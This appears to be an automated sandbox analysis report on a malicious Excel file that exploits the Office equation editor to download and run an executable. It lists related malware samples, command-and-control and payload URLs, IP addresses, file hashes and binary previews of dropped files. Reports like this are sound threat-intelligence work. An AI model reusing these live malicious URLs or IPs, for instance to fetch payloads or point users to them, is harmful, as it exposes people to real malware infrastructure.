                              Classification:mal100.troj.expl.evad.winXLSX@9/17@5/5
                              EGA Information:Failed
                              HDC Information:
                              • Successful, ratio: 26% (good quality ratio 24.3%)
                              • Quality average: 77.2%
                              • Quality standard deviation: 29.2%
                              HCA Information:
                              • Successful, ratio: 95%
                              • Number of executed functions: 129
                              • Number of non-executed functions: 76
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .xlsx
                              • Found Word or Excel or PowerPoint or XPS Viewer
                              • Attach to Office via COM
                              • Scroll down
                              • Close Viewer
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtCreateFile calls found.
                              • Report size getting too big, too many NtQueryAttributesFile calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              15:24:12API Interceptor66x Sleep call for process: EQNEDT32.EXE modified
                              15:24:15API Interceptor61x Sleep call for process: vbc.exe modified
                              15:24:38API Interceptor230x Sleep call for process: ipconfig.exe modified
                              15:25:31API Interceptor1x Sleep call for process: explorer.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              99.83.154.118WitNwYLlo9.exeGet hashmaliciousBrowse
                              • www.polkaface.network/ja3b/?hFN=ECSUTdLZYyvinGuxW602g0mhH6E+mNbiPpMr3Rm0jNJJ/jQZLEblo9xFFzyyk5FaoEXR&0vuXs2=8pt8MNg0
                              PROFORMA INVOICE PDF.exeGet hashmaliciousBrowse
                              • www.copinginfula.trade/owws/?y8z=te8+upsAlz11VMhTIlAnFNqzP7h21ZncoD0/naXG+u8xg9oMIJdghVQVRMs3z6YMH4+L&UDKPKv=04i8JpzhsHVX
                              Compliance - Notice 06-03.xlsxGet hashmaliciousBrowse
                              • www.defenestration.world/p2io/?eXNPCd=lrOqxb+UJCh0p+XgaZ1tkMjkgx31NOkXgmck/5zOeb61pSaxp+mpU6ffv/qKl6HzQ2hiJA==&g48=Rzu8Zr0hP
                              xgpUaKh6tH.dllGet hashmaliciousBrowse
                              • networkspeed.live/judhygdfsvhvgytrdgflkijh
                              1092991(JB#082).exeGet hashmaliciousBrowse
                              • www.francedeliverydhl.xyz/3edq/?JfEt9j6h=VGpD3cDxk+WQQnSbGEZ6RzsTI6tD4lieCm7QRd3bliZsykliVadFEeoi23HkozfQytXm&ojn0d=RzuliD
                              DHL4198278Err-PDF.exeGet hashmaliciousBrowse
                              • www.bakergirlsocialclub.com/ubqx/?VR-T5=lhf8xpGpMnD8mnA&XR-xe0lh=WnoIvCh7C4a+M1FCGYfg8Er+mfNEnZG31lLhOnu48mFBzd+Jpay6aKeImEu2q9SCEyoBWBEjrg==
                              RFQ - 001.xlsxGet hashmaliciousBrowse
                              • www.defenestration.world/p2io/?bdm=lrOqxb+UJCh0p+XgaZ1tkMjkgx31NOkXgmck/5zOeb61pSaxp+mpU6ffv/qKl6HzQ2hiJA==&CDH=oPR8Arf
                              b02c0831_by_Libranalysis.exeGet hashmaliciousBrowse
                              • www.defenestration.world/p2io/?Bv=lrOqxb+RJFhwpubsYZ1tkMjkgx31NOkXgmE0j6vPa760pj23uu3lC+ndsZq1iq/4SWJEQ9G3xQ==&M6AlS=yVFP-hwh
                              2UPdDxaAmt.exeGet hashmaliciousBrowse
                              • www.defenestration.world/p2io/?CN9=7nH8PLV&s0=lrOqxb+RJFhwpubsYZ1tkMjkgx31NOkXgmE0j6vPa760pj23uu3lC+ndsaGchqDAb18S
                              invoice.exeGet hashmaliciousBrowse
                              • www.francedeliverydhl.xyz/3edq/?URZh=VGpD3cDxk+WQQnSbGEZ6RzsTI6tD4lieCm7QRd3bliZsykliVadFEeoi20n0nSPosI+h&jL30vv=afhhplx
                              e759c6e8_by_Libranalysis.exeGet hashmaliciousBrowse
                              • www.defenestration.world/p2io/?RPx=lrOqxb+RJFhwpubsYZ1tkMjkgx31NOkXgmE0j6vPa760pj23uu3lC+ndsZmMuLT4FQVV&rVLp5Z=S0GhCH_
                              92270fdd_by_Libranalysis.exeGet hashmaliciousBrowse
                              • www.defenestration.world/p2io/?SR=lrOqxb+RJFhwpubsYZ1tkMjkgx31NOkXgmE0j6vPa760pj23uu3lC+ndsaG2+azAf30S&2d=9rj0CBJ
                              1bb71f86_by_Libranalysis.exeGet hashmaliciousBrowse
                              • www.mythree-informationupdates.com/njhr/?_89pb=/zO4UNfgdHCPEreRZ95iML5TdeDdCZBMXXzBOiwQzcrtbsVzRUIeP21tWMju+8f1ac1K&FPWl=Cd8tG
                              Documento.xlsxGet hashmaliciousBrowse
                              • indifoods.net/wp-includes/images/wlw/otedollars.exe
                              0d69e4f6_by_Libranalysis.xlsGet hashmaliciousBrowse
                              • www.destek-taleplerimiz.com/ccr/?y4O4=cWavVGQKmIqDppXzWyVy8r7Kst7Id+XyOUJHTBkcFhMzlMGfnIsimvg2OkFJfjv7X60kTQ==&pHE=kv2pMLCxOn
                              shipping document pdf.exeGet hashmaliciousBrowse
                              • www.kcgertfarm.com/htl/?_6Ax4N=YJE87vjpATZ&QFQL4Z=Y7TDP+px4JC/SSqVeQPAJJ3lS8rxz+cXHWUOWGnTGVC5LdKUNGbP50uDVhtUgmD5Xmz46i5nLA==
                              lBXZjiCuW0.exeGet hashmaliciousBrowse
                              • www.mythree-informationupdates.com/njhr/?uZWx=/zO4UNfgdHCPEreRZ95iML5TdeDdCZBMXXzBOiwQzcrtbsVzRUIeP21tWMjEhMv1ee9K&9r6LE=FbYDOl6

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              www.69-1hn7uc.netFORM B.xlsxGet hashmaliciousBrowse
                              • 163.43.122.101
                              U4JZ8cQqvU.exeGet hashmaliciousBrowse
                              • 163.43.122.113
                              fMWJqYA8ae.exeGet hashmaliciousBrowse
                              • 163.43.122.112
                              CONTRACT 312000H123 SSR ADVICE 31-05-2021 (1).xlsxGet hashmaliciousBrowse
                              • 163.43.122.106
                              xhbUdeAoVP.exeGet hashmaliciousBrowse
                              • 163.43.122.114
                              Contract RFQ01.xlsxGet hashmaliciousBrowse
                              • 163.43.122.120
                              O64Hou5qAF.exeGet hashmaliciousBrowse
                              • 163.43.122.119
                              a6362829_by_Libranalysis.exeGet hashmaliciousBrowse
                              • 163.43.122.126
                              RDAx9iDSEL.exeGet hashmaliciousBrowse
                              • 163.43.122.103
                              MrV6Do8tZr.exeGet hashmaliciousBrowse
                              • 163.43.122.103
                              k7AgZOwF4S.exeGet hashmaliciousBrowse
                              • 163.43.122.108
                              pCkqlKXv05.exeGet hashmaliciousBrowse
                              • 163.43.122.101
                              1ucvVfbHnD.exeGet hashmaliciousBrowse
                              • 163.43.122.108
                              Gt8AN6GiOD.exeGet hashmaliciousBrowse
                              • 163.43.122.118
                              pcBhOkLiD3.exeGet hashmaliciousBrowse
                              • 163.43.122.124
                              www.myfavbutik.comLkvumUsaQX.exeGet hashmaliciousBrowse
                              • 104.21.15.16
                              IsIMH5zplo.exeGet hashmaliciousBrowse
                              • 172.67.161.4
                              xhbUdeAoVP.exeGet hashmaliciousBrowse
                              • 172.67.161.4
                              n2fpCzXURP.exeGet hashmaliciousBrowse
                              • 172.67.161.4
                              7LQAaB3oH4.exeGet hashmaliciousBrowse
                              • 172.67.161.4
                              bin.exeGet hashmaliciousBrowse
                              • 104.21.15.16
                              netwire.exeGet hashmaliciousBrowse
                              • 172.67.161.4
                              noSpfWQqRD.exeGet hashmaliciousBrowse
                              • 104.21.15.16
                              e759c6e8_by_Libranalysis.exeGet hashmaliciousBrowse
                              • 172.67.161.4
                              APPROVED.xlsxGet hashmaliciousBrowse
                              • 104.21.15.16
                              5PthEm83NG.exeGet hashmaliciousBrowse
                              • 172.67.161.4
                              qmhFLhRoEc.exeGet hashmaliciousBrowse
                              • 104.21.15.16
                              dw0Iro1gcR.exeGet hashmaliciousBrowse
                              • 172.67.161.4
                              Request For Courtesy Call.xlsxGet hashmaliciousBrowse
                              • 104.21.15.16
                              g2qwgG2xbe.exeGet hashmaliciousBrowse
                              • 172.67.161.4
                              g0g865fQ2S.exeGet hashmaliciousBrowse
                              • 104.21.15.16
                              www.defenestration.worldLkvumUsaQX.exeGet hashmaliciousBrowse
                              • 99.83.154.118
                              Compliance - Notice 06-03.xlsxGet hashmaliciousBrowse
                              • 99.83.154.118
                              xhbUdeAoVP.exeGet hashmaliciousBrowse
                              • 99.83.154.118
                              Contract RFQ01.xlsxGet hashmaliciousBrowse
                              • 99.83.154.118
                              feAfWrgHcX.exeGet hashmaliciousBrowse
                              • 99.83.154.118
                              RFQ - 001.xlsxGet hashmaliciousBrowse
                              • 99.83.154.118
                              b02c0831_by_Libranalysis.exeGet hashmaliciousBrowse
                              • 99.83.154.118
                              2UPdDxaAmt.exeGet hashmaliciousBrowse
                              • 99.83.154.118
                              e759c6e8_by_Libranalysis.exeGet hashmaliciousBrowse
                              • 99.83.154.118
                              92270fdd_by_Libranalysis.exeGet hashmaliciousBrowse
                              • 99.83.154.118
                              FORM C.xlsxGet hashmaliciousBrowse
                              • 198.54.117.197
                              WGv1KTwWP5.exeGet hashmaliciousBrowse
                              • 198.54.117.197
                              lFfDzzZYTl.exeGet hashmaliciousBrowse
                              • 198.54.117.197
                              g2qwgG2xbe.exeGet hashmaliciousBrowse
                              • 198.54.117.197
                              Q1VDYnqeBX.exeGet hashmaliciousBrowse
                              • 198.54.117.197
                              50729032021.xlsxGet hashmaliciousBrowse
                              • 198.54.117.197
                              Gt8AN6GiOD.exeGet hashmaliciousBrowse
                              • 198.54.117.197
                              loMStbzHSP.exeGet hashmaliciousBrowse
                              • 198.54.117.197
                              27hKPHrVa3.exeGet hashmaliciousBrowse
                              • 198.54.117.197

                              ASN

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              SAKURA-BSAKURAInternetIncJPPayment slip.exeGet hashmaliciousBrowse
                              • 202.181.99.17
                              U4JZ8cQqvU.exeGet hashmaliciousBrowse
                              • 163.43.122.113
                              fMWJqYA8ae.exeGet hashmaliciousBrowse
                              • 163.43.122.112
                              CONTRACT 312000H123 SSR ADVICE 31-05-2021 (1).xlsxGet hashmaliciousBrowse
                              • 163.43.122.106
                              Contract RFQ01.xlsxGet hashmaliciousBrowse
                              • 163.43.122.120
                              O64Hou5qAF.exeGet hashmaliciousBrowse
                              • 163.43.122.119
                              SecuriteInfo.com.W32.Injector.AIC.genEldorado.7917.exeGet hashmaliciousBrowse
                              • 202.181.99.17
                              __ WeTransfer_Msg_Wav395991750.htmlGet hashmaliciousBrowse
                              • 202.181.99.65
                              a6362829_by_Libranalysis.exeGet hashmaliciousBrowse
                              • 163.43.122.126
                              INV74321.exeGet hashmaliciousBrowse
                              • 163.43.122.109
                              9cf2c56e_by_Libranalysis.exeGet hashmaliciousBrowse
                              • 160.16.215.66
                              RDAx9iDSEL.exeGet hashmaliciousBrowse
                              • 163.43.122.103
                              MrV6Do8tZr.exeGet hashmaliciousBrowse
                              • 163.43.122.103
                              pCkqlKXv05.exeGet hashmaliciousBrowse
                              • 163.43.122.101
                              Fax scanned 14-04-2021.exeGet hashmaliciousBrowse
                              • 59.106.19.83
                              1ucvVfbHnD.exeGet hashmaliciousBrowse
                              • 163.43.122.108
                              Gt8AN6GiOD.exeGet hashmaliciousBrowse
                              • 163.43.122.118
                              SecuriteInfo.com.Trojan.Locsyz.720.6619.exeGet hashmaliciousBrowse
                              • 202.181.99.44
                              Payment_Advice.exeGet hashmaliciousBrowse
                              • 163.43.102.44
                              PO CBV87654468.exeGet hashmaliciousBrowse
                              • 202.181.99.44
                              AMAZON-02US#U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTMGet hashmaliciousBrowse
                              • 143.204.98.37
                              Proforma Invoice and Bank swift-REG.PI-0086547654.exeGet hashmaliciousBrowse
                              • 75.2.26.18
                              U03c2doc.exeGet hashmaliciousBrowse
                              • 108.128.238.226
                              Letter 09JUN 2021.xlsxGet hashmaliciousBrowse
                              • 18.140.1.169
                              Docc.htmlGet hashmaliciousBrowse
                              • 13.224.99.74
                              ManyToOneMailMerge Ver 18.2.dotmGet hashmaliciousBrowse
                              • 52.209.246.140
                              Sleek_Free.exeGet hashmaliciousBrowse
                              • 143.204.209.58
                              ManyToOneMailMerge Ver 18.2.dotmGet hashmaliciousBrowse
                              • 52.216.141.230
                              #Ud83d#Udcde_#U25b6#Ufe0f.htmGet hashmaliciousBrowse
                              • 15.236.176.210
                              WV Northern Community College.docxGet hashmaliciousBrowse
                              • 52.43.249.183
                              wzdu53.exeGet hashmaliciousBrowse
                              • 13.249.13.113
                              com.duolingo_1162_apps.evozi.com.apkGet hashmaliciousBrowse
                              • 52.222.174.5
                              rnPij0Z886.dllGet hashmaliciousBrowse
                              • 13.224.91.73
                              Plex-v8.7.1.20931_build_812981296-armeabi-v7a(Apkgod.net).apkGet hashmaliciousBrowse
                              • 99.81.164.127
                              Nota Fiscal Eletronica 00111834.msiGet hashmaliciousBrowse
                              • 54.171.246.133
                              #U00a0Import Custom Duty invoice & its clearance documents.exeGet hashmaliciousBrowse
                              • 75.2.26.18
                              919780-920390.exeGet hashmaliciousBrowse
                              • 99.83.162.16
                              lLJGwAgWDh.exeGet hashmaliciousBrowse
                              • 13.56.50.119
                              KYC Compliance 10031.xlsxGet hashmaliciousBrowse
                              • 13.53.52.84
                              Official Request JUN 08 2021.xlsxGet hashmaliciousBrowse
                              • 13.53.52.84

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              C:\Users\Public\vbc.exeLetter 09JUN 2021.xlsxGet hashmaliciousBrowse
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exeLetter 09JUN 2021.xlsxGet hashmaliciousBrowse

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exe
                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:downloaded
                                  Size (bytes):993792
                                  Entropy (8bit):7.859694041798628
                                  Encrypted:false
                                  SSDEEP:24576:vo2y0RBSy/DrDoqbg1L+8XAaIXqziNeBUdt:vXNzrrDoeg1qYBIOiwBU
                                  MD5:15D907E7D9F8286E5053796C9D78FCEC
                                  SHA1:B7D7329E94E2292ED53E2778CEBEC533AC599030
                                  SHA-256:771E4F69520F71AFE6A6E9A4EB4DE7DCD8D7521D90DB290CA6C27B1A95C532AF
                                  SHA-512:C11D01A61F3DAB5923CC7C2A64EAE2732B5633376D3EF3F9FDF6A0E59567226ECA74B84E4CAD49DA87F6538B6C42C7F7A98A552C12E7B0917E6FF5F81D09F02E
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 15%
                                  Joe Sandbox View:
                                  • Filename: Letter 09JUN 2021.xlsx, Detection: malicious, Browse
                                  Reputation:low
                                  IE Cache URL:http://18.140.1.169/ggs/doc.exe
                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...[..`..............P..............=... ...@....@.. ....................................@..................................<..O....@.......................`.......;............................................... ............... ..H............text... .... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......(..............@..B.................<......H........T..............pX.. ............................................0............(!...(".........(.....o#....*.....................($......(%......(&......('......((....*N..(....o....()....*&..(*....*.s+........s,........s-........s.........s/........*....0...........~....o0....+..*.0...........~....o1....+..*.0...........~....o2....+..*.0...........~....o3....+..*.0...........~....o4....+..*&..(5....*...0..<........~.....(6.....,!r...p.....(7...o8...s9............~.....
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\45E96AD4.png
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):50311
                                  Entropy (8bit):7.960958863022709
                                  Encrypted:false
                                  SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                                  MD5:4141C7515CE64FED13BE6D2BA33299AA
                                  SHA1:B290F533537A734B7030CE1269AC8C5398754194
                                  SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                                  SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48CD381B.png
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):51166
                                  Entropy (8bit):7.767050944061069
                                  Encrypted:false
                                  SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                                  MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                  SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                                  SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                  SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                  Malicious:false
                                  Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\73F51C02.png
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):79394
                                  Entropy (8bit):7.864111100215953
                                  Encrypted:false
                                  SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                  MD5:16925690E9B366EA60B610F517789AF1
                                  SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                  SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                  SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                  Malicious:false
                                  Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\82A523E1.png
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):84203
                                  Entropy (8bit):7.979766688932294
                                  Encrypted:false
                                  SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                  MD5:208FD40D2F72D9AED77A86A44782E9E2
                                  SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                  SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                  SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                  Malicious:false
                                  Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\84A44456.png
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                  Category:dropped
                                  Size (bytes):49744
                                  Entropy (8bit):7.99056926749243
                                  Encrypted:true
                                  SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                  MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                  SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                  SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                  SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                  Malicious:false
                                  Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9EFF6EAC.png
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):79394
                                  Entropy (8bit):7.864111100215953
                                  Encrypted:false
                                  SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                  MD5:16925690E9B366EA60B610F517789AF1
                                  SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                  SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                  SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                  Malicious:false
                                  Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A7DD26BD.png
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):51166
                                  Entropy (8bit):7.767050944061069
                                  Encrypted:false
                                  SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                                  MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                  SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                                  SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                  SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                  Malicious:false
